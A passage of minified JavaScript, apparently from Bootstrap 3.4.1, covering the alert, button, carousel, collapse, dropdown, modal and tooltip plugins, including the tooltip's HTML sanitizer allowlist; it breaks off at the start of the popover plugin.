n(){o.detach().trigger("closed.bs.alert").remove()}t&&t.preventDefault(),o.length||(o=e.closest(".alert")),o.trigger(t=s.Event("close.bs.alert")),t.isDefaultPrevented()||(o.removeClass("in"),s.support.transition&&o.hasClass("fade")?o.one("bsTransitionEnd",n).emulateTransitionEnd(a.TRANSITION_DURATION):n())};var t=s.fn.alert;s.fn.alert=function o(i){return this.each(function(){var t=s(this),e=t.data("bs.alert");e||t.data("bs.alert",e=new a(this)),"string"==typeof i&&e[i].call(t)})},s.fn.alert.Constructor=a,s.fn.alert.noConflict=function(){return s.fn.alert=t,this},s(document).on("click.bs.alert.data-api",e,a.prototype.close)}(jQuery),function(s){"use strict";var n=function(t,e){this.$element=s(t),this.options=s.extend({},n.DEFAULTS,e),this.isLoading=!1};function i(o){return this.each(function(){var t=s(this),e=t.data("bs.button"),i="object"==typeof o&&o;e||t.data("bs.button",e=new n(this,i)),"toggle"==o?e.toggle():o&&e.setState(o)})}n.VERSION="3.4.1",n.DEFAULTS={loadingText:"loading..."},n.prototype.setState=function(t){var e="disabled",i=this.$element,o=i.is("input")?"val":"html",n=i.data();t+="Text",null==n.resetText&&i.data("resetText",i[o]()),setTimeout(s.proxy(function(){i[o](null==n[t]?this.options[t]:n[t]),"loadingText"==t?(this.isLoading=!0,i.addClass(e).attr(e,e).prop(e,!0)):this.isLoading&&(this.isLoading=!1,i.removeClass(e).removeAttr(e).prop(e,!1))},this),0)},n.prototype.toggle=function(){var t=!0,e=this.$element.closest('[data-toggle="buttons"]');if(e.length){var i=this.$element.find("input");"radio"==i.prop("type")?(i.prop("checked")&&(t=!1),e.find(".active").removeClass("active"),this.$element.addClass("active")):"checkbox"==i.prop("type")&&(i.prop("checked")!==this.$element.hasClass("active")&&(t=!1),this.$element.toggleClass("active")),i.prop("checked",this.$element.hasClass("active")),t&&i.trigger("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var t=s.fn.button;s.fn.button=i,s.fn.button.Constructor=n,s.fn.button.noConflict=function(){return s.fn.button=t,this},s(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(t){var e=s(t.target).closest(".btn");i.call(e,"toggle"),s(t.target).is('input[type="radio"], input[type="checkbox"]')||(t.preventDefault(),e.is("input,button")?e.trigger("focus"):e.find("input:visible,button:visible").first().trigger("focus"))}).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="button"]',function(t){s(t.target).closest(".btn").toggleClass("focus",/^focus(in)?$/.test(t.type))})}(jQuery),function(p){"use strict";var c=function(t,e){this.$element=p(t),this.$indicators=this.$element.find(".carousel-indicators"),this.options=e,this.paused=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",p.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$element.on("mouseenter.bs.carousel",p.proxy(this.pause,this)).on("mouseleave.bs.carousel",p.proxy(this.cycle,this))};function r(n){return this.each(function(){var t=p(this),e=t.data("bs.carousel"),i=p.extend({},c.DEFAULTS,t.data(),"object"==typeof n&&n),o="string"==typeof n?n:i.slide;e||t.data("bs.carousel",e=new c(this,i)),"number"==typeof n?e.to(n):o?e[o]():i.interval&&e.pause().cycle()})}c.VERSION="3.4.1",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(t){if(!/input|textarea/i.test(t.target.tagName)){switch(t.which){case 37:this.prev();break;case 39:this.next();break;default:return}t.preventDefault()}},c.prototype.cycle=function(t){return t||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(p.proxy(this.next,this),this.options.interval)),this},c.prototype.getItemIndex=function(t){return this.$items=t.parent().children(".item"),this.$items.index(t||this.$active)},c.prototype.getItemForDirection=function(t,e){var i=this.getItemIndex(e);if(("prev"==t&&0===i||"next"==t&&i==this.$items.length-1)&&!this.options.wrap)return e;var o=(i+("prev"==t?-1:1))%this.$items.length;return this.$items.eq(o)},c.prototype.to=function(t){var e=this,i=this.getItemIndex(this.$active=this.$element.find(".item.active"));if(!(t>this.$items.length-1||t<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){e.to(t)}):i==t?this.pause().cycle():this.slide(i<t?"next":"prev",this.$items.eq(t))},c.prototype.pause=function(t){return t||(this.paused=!0),this.$element.find(".next, .prev").length&&p.support.transition&&(this.$element.trigger(p.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){if(!this.sliding)return this.slide("next")},c.prototype.prev=function(){if(!this.sliding)return this.slide("prev")},c.prototype.slide=function(t,e){var i=this.$element.find(".item.active"),o=e||this.getItemForDirection(t,i),n=this.interval,s="next"==t?"left":"right",a=this;if(o.hasClass("active"))return this.sliding=!1;var r=o[0],l=p.Event("slide.bs.carousel",{relatedTarget:r,direction:s});if(this.$element.trigger(l),!l.isDefaultPrevented()){if(this.sliding=!0,n&&this.pause(),this.$indicators.length){this.$indicators.find(".active").removeClass("active");var h=p(this.$indicators.children()[this.getItemIndex(o)]);h&&h.addClass("active")}var d=p.Event("slid.bs.carousel",{relatedTarget:r,direction:s});return p.support.transition&&this.$element.hasClass("slide")?(o.addClass(t),"object"==typeof o&&o.length&&o[0].offsetWidth,i.addClass(s),o.addClass(s),i.one("bsTransitionEnd",function(){o.removeClass([t,s].join(" ")).addClass("active"),i.removeClass(["active",s].join(" ")),a.sliding=!1,setTimeout(function(){a.$element.trigger(d)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(i.removeClass("active"),o.addClass("active"),this.sliding=!1,this.$element.trigger(d)),n&&this.cycle(),this}};var t=p.fn.carousel;p.fn.carousel=r,p.fn.carousel.Constructor=c,p.fn.carousel.noConflict=function(){return p.fn.carousel=t,this};var e=function(t){var e=p(this),i=e.attr("href");i&&(i=i.replace(/.*(?=#[^\s]+$)/,""));var o=e.attr("data-target")||i,n=p(document).find(o);if(n.hasClass("carousel")){var s=p.extend({},n.data(),e.data()),a=e.attr("data-slide-to");a&&(s.interval=!1),r.call(n,s),a&&n.data("bs.carousel").to(a),t.preventDefault()}};p(document).on("click.bs.carousel.data-api","[data-slide]",e).on("click.bs.carousel.data-api","[data-slide-to]",e),p(window).on("load",function(){p('[data-ride="carousel"]').each(function(){var t=p(this);r.call(t,t.data())})})}(jQuery),function(a){"use strict";var r=function(t,e){this.$element=a(t),this.options=a.extend({},r.DEFAULTS,e),this.$trigger=a('[data-toggle="collapse"][href="#'+t.id+'"],[data-toggle="collapse"][data-target="#'+t.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};function n(t){var e,i=t.attr("data-target")||(e=t.attr("href"))&&e.replace(/.*(?=#[^\s]+$)/,"");return a(document).find(i)}function l(o){return this.each(function(){var t=a(this),e=t.data("bs.collapse"),i=a.extend({},r.DEFAULTS,t.data(),"object"==typeof o&&o);!e&&i.toggle&&/show|hide/.test(o)&&(i.toggle=!1),e||t.data("bs.collapse",e=new r(this,i)),"string"==typeof o&&e[o]()})}r.VERSION="3.4.1",r.TRANSITION_DURATION=350,r.DEFAULTS={toggle:!0},r.prototype.dimension=function(){return this.$element.hasClass("width")?"width":"height"},r.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var t,e=this.$parent&&this.$parent.children(".panel").children(".in, .collapsing");if(!(e&&e.length&&(t=e.data("bs.collapse"))&&t.transitioning)){var i=a.Event("show.bs.collapse");if(this.$element.trigger(i),!i.isDefaultPrevented()){e&&e.length&&(l.call(e,"hide"),t||e.data("bs.collapse",null));var o=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[o](0).attr("aria-expanded",!0),this.$trigger.removeClass("collapsed").attr("aria-expanded",!0),this.transitioning=1;var n=function(){this.$element.removeClass("collapsing").addClass("collapse in")[o](""),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return n.call(this);var s=a.camelCase(["scroll",o].join("-"));this.$element.one("bsTransitionEnd",a.proxy(n,this)).emulateTransitionEnd(r.TRANSITION_DURATION)[o](this.$element[0][s])}}}},r.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var t=a.Event("hide.bs.collapse");if(this.$element.trigger(t),!t.isDefaultPrevented()){var e=this.dimension();this.$element[e](this.$element[e]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse in").attr("aria-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var i=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};if(!a.support.transition)return i.call(this);this.$element[e](0).one("bsTransitionEnd",a.proxy(i,this)).emulateTransitionEnd(r.TRANSITION_DURATION)}}},r.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()},r.prototype.getParent=function(){return a(document).find(this.options.parent).find('[data-toggle="collapse"][data-parent="'+this.options.parent+'"]').each(a.proxy(function(t,e){var i=a(e);this.addAriaAndCollapsedClass(n(i),i)},this)).end()},r.prototype.addAriaAndCollapsedClass=function(t,e){var i=t.hasClass("in");t.attr("aria-expanded",i),e.toggleClass("collapsed",!i).attr("aria-expanded",i)};var t=a.fn.collapse;a.fn.collapse=l,a.fn.collapse.Constructor=r,a.fn.collapse.noConflict=function(){return a.fn.collapse=t,this},a(document).on("click.bs.collapse.data-api",'[data-toggle="collapse"]',function(t){var e=a(this);e.attr("data-target")||t.preventDefault();var i=n(e),o=i.data("bs.collapse")?"toggle":e.data();l.call(i,o)})}(jQuery),function(a){"use strict";var r='[data-toggle="dropdown"]',o=function(t){a(t).on("click.bs.dropdown",this.toggle)};function l(t){var e=t.attr("data-target");e||(e=(e=t.attr("href"))&&/#[A-Za-z]/.test(e)&&e.replace(/.*(?=#[^\s]*$)/,""));var i="#"!==e?a(document).find(e):null;return i&&i.length?i:t.parent()}function s(o){o&&3===o.which||(a(".dropdown-backdrop").remove(),a(r).each(function(){var t=a(this),e=l(t),i={relatedTarget:this};e.hasClass("open")&&(o&&"click"==o.type&&/input|textarea/i.test(o.target.tagName)&&a.contains(e[0],o.target)||(e.trigger(o=a.Event("hide.bs.dropdown",i)),o.isDefaultPrevented()||(t.attr("aria-expanded","false"),e.removeClass("open").trigger(a.Event("hidden.bs.dropdown",i)))))}))}o.VERSION="3.4.1",o.prototype.toggle=function(t){var e=a(this);if(!e.is(".disabled, :disabled")){var i=l(e),o=i.hasClass("open");if(s(),!o){"ontouchstart"in document.documentElement&&!i.closest(".navbar-nav").length&&a(document.createElement("div")).addClass("dropdown-backdrop").insertAfter(a(this)).on("click",s);var n={relatedTarget:this};if(i.trigger(t=a.Event("show.bs.dropdown",n)),t.isDefaultPrevented())return;e.trigger("focus").attr("aria-expanded","true"),i.toggleClass("open").trigger(a.Event("shown.bs.dropdown",n))}return!1}},o.prototype.keydown=function(t){if(/(38|40|27|32)/.test(t.which)&&!/input|textarea/i.test(t.target.tagName)){var e=a(this);if(t.preventDefault(),t.stopPropagation(),!e.is(".disabled, :disabled")){var i=l(e),o=i.hasClass("open");if(!o&&27!=t.which||o&&27==t.which)return 27==t.which&&i.find(r).trigger("focus"),e.trigger("click");var n=i.find(".dropdown-menu li:not(.disabled):visible a");if(n.length){var s=n.index(t.target);38==t.which&&0<s&&s--,40==t.which&&s<n.length-1&&s++,~s||(s=0),n.eq(s).trigger("focus")}}}};var t=a.fn.dropdown;a.fn.dropdown=function e(i){return this.each(function(){var t=a(this),e=t.data("bs.dropdown");e||t.data("bs.dropdown",e=new o(this)),"string"==typeof i&&e[i].call(t)})},a.fn.dropdown.Constructor=o,a.fn.dropdown.noConflict=function(){return a.fn.dropdown=t,this},a(document).on("click.bs.dropdown.data-api",s).on("click.bs.dropdown.data-api",".dropdown form",function(t){t.stopPropagation()}).on("click.bs.dropdown.data-api",r,o.prototype.toggle).on("keydown.bs.dropdown.data-api",r,o.prototype.keydown).on("keydown.bs.dropdown.data-api",".dropdown-menu",o.prototype.keydown)}(jQuery),function(a){"use strict";var s=function(t,e){this.options=e,this.$body=a(document.body),this.$element=a(t),this.$dialog=this.$element.find(".modal-dialog"),this.$backdrop=null,this.isShown=null,this.originalBodyPad=null,this.scrollbarWidth=0,this.ignoreBackdropClick=!1,this.fixedContent=".navbar-fixed-top, .navbar-fixed-bottom",this.options.remote&&this.$element.find(".modal-content").load(this.options.remote,a.proxy(function(){this.$element.trigger("loaded.bs.modal")},this))};function r(o,n){return this.each(function(){var t=a(this),e=t.data("bs.modal"),i=a.extend({},s.DEFAULTS,t.data(),"object"==typeof o&&o);e||t.data("bs.modal",e=new s(this,i)),"string"==typeof o?e[o](n):i.show&&e.show(n)})}s.VERSION="3.4.1",s.TRANSITION_DURATION=300,s.BACKDROP_TRANSITION_DURATION=150,s.DEFAULTS={backdrop:!0,keyboard:!0,show:!0},s.prototype.toggle=function(t){return this.isShown?this.hide():this.show(t)},s.prototype.show=function(i){var o=this,t=a.Event("show.bs.modal",{relatedTarget:i});this.$element.trigger(t),this.isShown||t.isDefaultPrevented()||(this.isShown=!0,this.checkScrollbar(),this.setScrollbar(),this.$body.addClass("modal-open"),this.escape(),this.resize(),this.$element.on("click.dismiss.bs.modal",'[data-dismiss="modal"]',a.proxy(this.hide,this)),this.$dialog.on("mousedown.dismiss.bs.modal",function(){o.$element.one("mouseup.dismiss.bs.modal",function(t){a(t.target).is(o.$element)&&(o.ignoreBackdropClick=!0)})}),this.backdrop(function(){var t=a.support.transition&&o.$element.hasClass("fade");o.$element.parent().length||o.$element.appendTo(o.$body),o.$element.show().scrollTop(0),o.adjustDialog(),t&&o.$element[0].offsetWidth,o.$element.addClass("in"),o.enforceFocus();var e=a.Event("shown.bs.modal",{relatedTarget:i});t?o.$dialog.one("bsTransitionEnd",function(){o.$element.trigger("focus").trigger(e)}).emulateTransitionEnd(s.TRANSITION_DURATION):o.$element.trigger("focus").trigger(e)}))},s.prototype.hide=function(t){t&&t.preventDefault(),t=a.Event("hide.bs.modal"),this.$element.trigger(t),this.isShown&&!t.isDefaultPrevented()&&(this.isShown=!1,this.escape(),this.resize(),a(document).off("focusin.bs.modal"),this.$element.removeClass("in").off("click.dismiss.bs.modal").off("mouseup.dismiss.bs.modal"),this.$dialog.off("mousedown.dismiss.bs.modal"),a.support.transition&&this.$element.hasClass("fade")?this.$element.one("bsTransitionEnd",a.proxy(this.hideModal,this)).emulateTransitionEnd(s.TRANSITION_DURATION):this.hideModal())},s.prototype.enforceFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(t){document===t.target||this.$element[0]===t.target||this.$element.has(t.target).length||this.$element.trigger("focus")},this))},s.prototype.escape=function(){this.isShown&&this.options.keyboard?this.$element.on("keydown.dismiss.bs.modal",a.proxy(function(t){27==t.which&&this.hide()},this)):this.isShown||this.$element.off("keydown.dismiss.bs.modal")},s.prototype.resize=function(){this.isShown?a(window).on("resize.bs.modal",a.proxy(this.handleUpdate,this)):a(window).off("resize.bs.modal")},s.prototype.hideModal=function(){var t=this;this.$element.hide(),this.backdrop(function(){t.$body.removeClass("modal-open"),t.resetAdjustments(),t.resetScrollbar(),t.$element.trigger("hidden.bs.modal")})},s.prototype.removeBackdrop=function(){this.$backdrop&&this.$backdrop.remove(),this.$backdrop=null},s.prototype.backdrop=function(t){var e=this,i=this.$element.hasClass("fade")?"fade":"";if(this.isShown&&this.options.backdrop){var o=a.support.transition&&i;if(this.$backdrop=a(document.createElement("div")).addClass("modal-backdrop "+i).appendTo(this.$body),this.$element.on("click.dismiss.bs.modal",a.proxy(function(t){this.ignoreBackdropClick?this.ignoreBackdropClick=!1:t.target===t.currentTarget&&("static"==this.options.backdrop?this.$element[0].focus():this.hide())},this)),o&&this.$backdrop[0].offsetWidth,this.$backdrop.addClass("in"),!t)return;o?this.$backdrop.one("bsTransitionEnd",t).emulateTransitionEnd(s.BACKDROP_TRANSITION_DURATION):t()}else if(!this.isShown&&this.$backdrop){this.$backdrop.removeClass("in");var n=function(){e.removeBackdrop(),t&&t()};a.support.transition&&this.$element.hasClass("fade")?this.$backdrop.one("bsTransitionEnd",n).emulateTransitionEnd(s.BACKDROP_TRANSITION_DURATION):n()}else t&&t()},s.prototype.handleUpdate=function(){this.adjustDialog()},s.prototype.adjustDialog=function(){var t=this.$element[0].scrollHeight>document.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&t?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!t?this.scrollbarWidth:""})},s.prototype.resetAdjustments=function(){this.$element.css({paddingLeft:"",paddingRight:""})},s.prototype.checkScrollbar=function(){var t=window.innerWidth;if(!t){var e=document.documentElement.getBoundingClientRect();t=e.right-Math.abs(e.left)}this.bodyIsOverflowing=document.body.clientWidth<t,this.scrollbarWidth=this.measureScrollbar()},s.prototype.setScrollbar=function(){var t=parseInt(this.$body.css("padding-right")||0,10);this.originalBodyPad=document.body.style.paddingRight||"";var n=this.scrollbarWidth;this.bodyIsOverflowing&&(this.$body.css("padding-right",t+n),a(this.fixedContent).each(function(t,e){var i=e.style.paddingRight,o=a(e).css("padding-right");a(e).data("padding-right",i).css("padding-right",parseFloat(o)+n+"px")}))},s.prototype.resetScrollbar=function(){this.$body.css("padding-right",this.originalBodyPad),a(this.fixedContent).each(function(t,e){var i=a(e).data("padding-right");a(e).removeData("padding-right"),e.style.paddingRight=i||""})},s.prototype.measureScrollbar=function(){var t=document.createElement("div");t.className="modal-scrollbar-measure",this.$body.append(t);var e=t.offsetWidth-t.clientWidth;return this.$body[0].removeChild(t),e};var t=a.fn.modal;a.fn.modal=r,a.fn.modal.Constructor=s,a.fn.modal.noConflict=function(){return a.fn.modal=t,this},a(document).on("click.bs.modal.data-api",'[data-toggle="modal"]',function(t){var e=a(this),i=e.attr("href"),o=e.attr("data-target")||i&&i.replace(/.*(?=#[^\s]+$)/,""),n=a(document).find(o),s=n.data("bs.modal")?"toggle":a.extend({remote:!/#/.test(i)&&i},n.data(),e.data());e.is("a")&&t.preventDefault(),n.one("show.bs.modal",function(t){t.isDefaultPrevented()||n.one("hidden.bs.modal",function(){e.is(":visible")&&e.trigger("focus")})}),r.call(n,s,this)})}(jQuery),function(g){"use strict";var o=["sanitize","whiteList","sanitizeFn"],a=["background","cite","href","itemtype","longdesc","poster","src","xlink:href"],t={"*":["class","dir","id","lang","role",/^aria-[\w-]*$/i],a:["target","href","title","rel"],area:[],b:[],br:[],col:[],code:[],div:[],em:[],hr:[],h1:[],h2:[],h3:[],h4:[],h5:[],h6:[],i:[],img:["src","alt","title","width","height"],li:[],ol:[],p:[],pre:[],s:[],small:[],span:[],sub:[],sup:[],strong:[],u:[],ul:[]},r=/^(?:(?:https?|mailto|ftp|tel|file):|[^&:/?#]*(?:[/?#]|$))/gi,l=/^data:(?:image\/(?:bmp|gif|jpeg|jpg|png|tiff|webp)|video\/(?:mpeg|mp4|ogg|webm)|audio\/(?:mp3|oga|ogg|opus));base64,[a-z0-9+/]+=*$/i;function u(t,e){var i=t.nodeName.toLowerCase();if(-1!==g.inArray(i,e))return-1===g.inArray(i,a)||Boolean(t.nodeValue.match(r)||t.nodeValue.match(l));for(var o=g(e).filter(function(t,e){return e instanceof RegExp}),n=0,s=o.length;n<s;n++)if(i.match(o[n]))return!0;return!1}function n(t,e,i){if(0===t.length)return t;if(i&&"function"==typeof i)return i(t);if(!document.implementation||!document.implementation.createHTMLDocument)return t;var o=document.implementation.createHTMLDocument("sanitization");o.body.innerHTML=t;for(var n=g.map(e,function(t,e){return e}),s=g(o.body).find("*"),a=0,r=s.length;a<r;a++){var l=s[a],h=l.nodeName.toLowerCase();if(-1!==g.inArray(h,n))for(var d=g.map(l.attributes,function(t){return t}),p=[].concat(e["*"]||[],e[h]||[]),c=0,f=d.length;c<f;c++)u(d[c],p)||l.removeAttribute(d[c].nodeName);else l.parentNode.removeChild(l)}return o.body.innerHTML}var m=function(t,e){this.type=null,this.options=null,this.enabled=null,this.timeout=null,this.hoverState=null,this.$element=null,this.inState=null,this.init("tooltip",t,e)};m.VERSION="3.4.1",m.TRANSITION_DURATION=150,m.DEFAULTS={animation:!0,placement:"top",selector:!1,template:'<div class="tooltip" role="tooltip"><div class="tooltip-arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,container:!1,viewport:{selector:"body",padding:0},sanitize:!0,sanitizeFn:null,whiteList:t},m.prototype.init=function(t,e,i){if(this.enabled=!0,this.type=t,this.$element=g(e),this.options=this.getOptions(i),this.$viewport=this.options.viewport&&g(document).find(g.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!");for(var o=this.options.trigger.split(" "),n=o.length;n--;){var s=o[n];if("click"==s)this.$element.on("click."+this.type,this.options.selector,g.proxy(this.toggle,this));else if("manual"!=s){var a="hover"==s?"mouseenter":"focusin",r="hover"==s?"mouseleave":"focusout";this.$element.on(a+"."+this.type,this.options.selector,g.proxy(this.enter,this)),this.$element.on(r+"."+this.type,this.options.selector,g.proxy(this.leave,this))}}this.options.selector?this._options=g.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},m.prototype.getDefaults=function(){return m.DEFAULTS},m.prototype.getOptions=function(t){var e=this.$element.data();for(var i in e)e.hasOwnProperty(i)&&-1!==g.inArray(i,o)&&delete e[i];return(t=g.extend({},this.getDefaults(),e,t)).delay&&"number"==typeof t.delay&&(t.delay={show:t.delay,hide:t.delay}),t.sanitize&&(t.template=n(t.template,t.whiteList,t.sanitizeFn)),t},m.prototype.getDelegateOptions=function(){var i={},o=this.getDefaults();return this._options&&g.each(this._options,function(t,e){o[t]!=e&&(i[t]=e)}),i},m.prototype.enter=function(t){var e=t instanceof this.constructor?t:g(t.currentTarget).data("bs."+this.type);if(e||(e=new this.constructor(t.currentTarget,this.getDelegateOptions()),g(t.currentTarget).data("bs."+this.type,e)),t instanceof g.Event&&(e.inState["focusin"==t.type?"focus":"hover"]=!0),e.tip().hasClass("in")||"in"==e.hoverState)e.hoverState="in";else{if(clearTimeout(e.timeout),e.hoverState="in",!e.options.delay||!e.options.delay.show)return e.show();e.timeout=setTimeout(function(){"in"==e.hoverState&&e.show()},e.options.delay.show)}},m.prototype.isInStateTrue=function(){for(var t in this.inState)if(this.inState[t])return!0;return!1},m.prototype.leave=function(t){var e=t instanceof this.constructor?t:g(t.currentTarget).data("bs."+this.type);if(e||(e=new this.constructor(t.currentTarget,this.getDelegateOptions()),g(t.currentTarget).data("bs."+this.type,e)),t instanceof g.Event&&(e.inState["focusout"==t.type?"focus":"hover"]=!1),!e.isInStateTrue()){if(clearTimeout(e.timeout),e.hoverState="out",!e.options.delay||!e.options.delay.hide)return e.hide();e.timeout=setTimeout(function(){"out"==e.hoverState&&e.hide()},e.options.delay.hide)}},m.prototype.show=function(){var t=g.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){this.$element.trigger(t);var e=g.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(t.isDefaultPrevented()||!e)return;var i=this,o=this.tip(),n=this.getUID(this.type);this.setContent(),o.attr("id",n),this.$element.attr("aria-describedby",n),this.options.animation&&o.addClass("fade");var s="function"==typeof this.options.placement?this.options.placement.call(this,o[0],this.$element[0]):this.options.placement,a=/\s?auto?\s?/i,r=a.test(s);r&&(s=s.replace(a,"")||"top"),o.detach().css({top:0,left:0,display:"block"}).addClass(s).data("bs."+this.type,this),this.options.container?o.appendTo(g(document).find(this.options.container)):o.insertAfter(this.$element),this.$element.trigger("inserted.bs."+this.type);var l=this.getPosition(),h=o[0].offsetWidth,d=o[0].offsetHeight;if(r){var p=s,c=this.getPosition(this.$viewport);s="bottom"==s&&l.bottom+d>c.bottom?"top":"top"==s&&l.top-d<c.top?"bottom":"right"==s&&l.right+h>c.width?"left":"left"==s&&l.left-h<c.left?"right":s,o.removeClass(p).addClass(s)}var f=this.getCalculatedOffset(s,l,h,d);this.applyPlacement(f,s);var u=function(){var t=i.hoverState;i.$element.trigger("shown.bs."+i.type),i.hoverState=null,"out"==t&&i.leave(i)};g.support.transition&&this.$tip.hasClass("fade")?o.one("bsTransitionEnd",u).emulateTransitionEnd(m.TRANSITION_DURATION):u()}},m.prototype.applyPlacement=function(t,e){var i=this.tip(),o=i[0].offsetWidth,n=i[0].offsetHeight,s=parseInt(i.css("margin-top"),10),a=parseInt(i.css("margin-left"),10);isNaN(s)&&(s=0),isNaN(a)&&(a=0),t.top+=s,t.left+=a,g.offset.setOffset(i[0],g.extend({using:function(t){i.css({top:Math.round(t.top),left:Math.round(t.left)})}},t),0),i.addClass("in");var r=i[0].offsetWidth,l=i[0].offsetHeight;"top"==e&&l!=n&&(t.top=t.top+n-l);var h=this.getViewportAdjustedDelta(e,t,r,l);h.left?t.left+=h.left:t.top+=h.top;var d=/top|bottom/.test(e),p=d?2*h.left-o+r:2*h.top-n+l,c=d?"offsetWidth":"offsetHeight";i.offset(t),this.replaceArrow(p,i[0][c],d)},m.prototype.replaceArrow=function(t,e,i){this.arrow().css(i?"left":"top",50*(1-t/e)+"%").css(i?"top":"left","")},m.prototype.setContent=function(){var t=this.tip(),e=this.getTitle();this.options.html?(this.options.sanitize&&(e=n(e,this.options.whiteList,this.options.sanitizeFn)),t.find(".tooltip-inner").html(e)):t.find(".tooltip-inner").text(e),t.removeClass("fade in top bottom left right")},m.prototype.hide=function(t){var e=this,i=g(this.$tip),o=g.Event("hide.bs."+this.type);function n(){"in"!=e.hoverState&&i.detach(),e.$element&&e.$element.removeAttr("aria-describedby").trigger("hidden.bs."+e.type),t&&t()}if(this.$element.trigger(o),!o.isDefaultPrevented())return i.removeClass("in"),g.support.transition&&i.hasClass("fade")?i.one("bsTransitionEnd",n).emulateTransitionEnd(m.TRANSITION_DURATION):n(),this.hoverState=null,this},m.prototype.fixTitle=function(){var t=this.$element;(t.attr("title")||"string"!=typeof t.attr("data-original-title"))&&t.attr("data-original-title",t.attr("title")||"").attr("title","")},m.prototype.hasContent=function(){return this.getTitle()},m.prototype.getPosition=function(t){var e=(t=t||this.$element)[0],i="BODY"==e.tagName,o=e.getBoundingClientRect();null==o.width&&(o=g.extend({},o,{width:o.right-o.left,height:o.bottom-o.top}));var n=window.SVGElement&&e instanceof window.SVGElement,s=i?{top:0,left:0}:n?null:t.offset(),a={scroll:i?document.documentElement.scrollTop||document.body.scrollTop:t.scrollTop()},r=i?{width:g(window).width(),height:g(window).height()}:null;return g.extend({},o,a,r,s)},m.prototype.getCalculatedOffset=function(t,e,i,o){return"bottom"==t?{top:e.top+e.height,left:e.left+e.width/2-i/2}:"top"==t?{top:e.top-o,left:e.left+e.width/2-i/2}:"left"==t?{top:e.top+e.height/2-o/2,left:e.left-i}:{top:e.top+e.height/2-o/2,left:e.left+e.width}},m.prototype.getViewportAdjustedDelta=function(t,e,i,o){var n={top:0,left:0};if(!this.$viewport)return n;var s=this.options.viewport&&this.options.viewport.padding||0,a=this.getPosition(this.$viewport);if(/right|left/.test(t)){var r=e.top-s-a.scroll,l=e.top+s-a.scroll+o;r<a.top?n.top=a.top-r:l>a.top+a.height&&(n.top=a.top+a.height-l)}else{var h=e.left-s,d=e.left+s+i;h<a.left?n.left=a.left-h:d>a.right&&(n.left=a.left+a.width-d)}return n},m.prototype.getTitle=function(){var t=this.$element,e=this.options;return t.attr("data-original-title")||("function"==typeof e.title?e.title.call(t[0]):e.title)},m.prototype.getUID=function(t){for(;t+=~~(1e6*Math.random()),document.getElementById(t););return t},m.prototype.tip=function(){if(!this.$tip&&(this.$tip=g(this.options.template),1!=this.$tip.length))throw new Error(this.type+" `template` option must consist of exactly 1 top-level element!");return this.$tip},m.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},m.prototype.enable=function(){this.enabled=!0},m.prototype.disable=function(){this.enabled=!1},m.prototype.toggleEnabled=function(){this.enabled=!this.enabled},m.prototype.toggle=function(t){var e=this;t&&((e=g(t.currentTarget).data("bs."+this.type))||(e=new this.constructor(t.currentTarget,this.getDelegateOptions()),g(t.currentTarget).data("bs."+this.type,e))),t?(e.inState.click=!e.inState.click,e.isInStateTrue()?e.enter(e):e.leave(e)):e.tip().hasClass("in")?e.leave(e):e.enter(e)},m.prototype.destroy=function(){var t=this;clearTimeout(this.timeout),this.hide(function(){t.$element.off("."+t.type).removeData("bs."+t.type),t.$tip&&t.$tip.detach(),t.$tip=null,t.$arrow=null,t.$viewport=null,t.$element=null})},m.prototype.sanitizeHtml=function(t){return n(t,this.options.whiteList,this.options.sanitizeFn)};var e=g.fn.tooltip;g.fn.tooltip=function i(o){return this.each(function(){var t=g(this),e=t.data("bs.tooltip"),i="object"==typeof o&&o;!e&&/destroy|hide/.test(o)||(e||t.data("bs.tooltip",e=new m(this,i)),"string"==typeof o&&e[o]())})},g.fn.tooltip.Constructor=m,g.fn.tooltip.noConflict=function(){return g.fn.tooltip=e,this}}(jQuery),function(n){"use strict";var s=function(t,e){this.init("popover",t,e)};if(!n.fn.tooltip)throw new Error("Popover requires tooltip.js");s.VERSION="3.4.1",s.DEFAULTS=n.extend({},n.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:'<div class="popover" role="tooltip"><div class="arrow"></div><h3 class="popover-title"></h3><div class="popover-content"></div></div>'}),((s.prototype=n.extend({},n.fn.tooltip.Constructor.prototype)).constructor=s).prototype.getDefaults=function(){return 